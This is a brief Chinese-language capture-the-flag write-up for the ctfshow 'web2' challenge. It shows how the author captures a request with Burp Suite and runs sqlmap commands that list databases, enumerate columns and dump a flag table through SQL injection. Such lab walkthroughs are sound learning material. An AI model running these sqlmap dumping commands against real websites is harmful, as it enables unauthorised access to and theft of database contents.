备注:本文仅供自用,如有错误,欢迎指出
原题地址:
ctfshow-web2
解题思路:
1.首先看题目像SQL注入,于是用burpsuit抓包
把以上所有内容复制到1.txt中
2.使用sqlmap,使用指令
sqlmap -r 1.txt --dbs --batch
得到一堆数据库名
针对数据库web2(与题目名字一致)再爆表名,使用指令
sqlmap -r 1.txt -D web2 --columns --batch
得到列名,再对列进行爆破,使用指令
sqlmap -r 1.txt -D web2 -T flag --columns flag --dump --batch
得到flag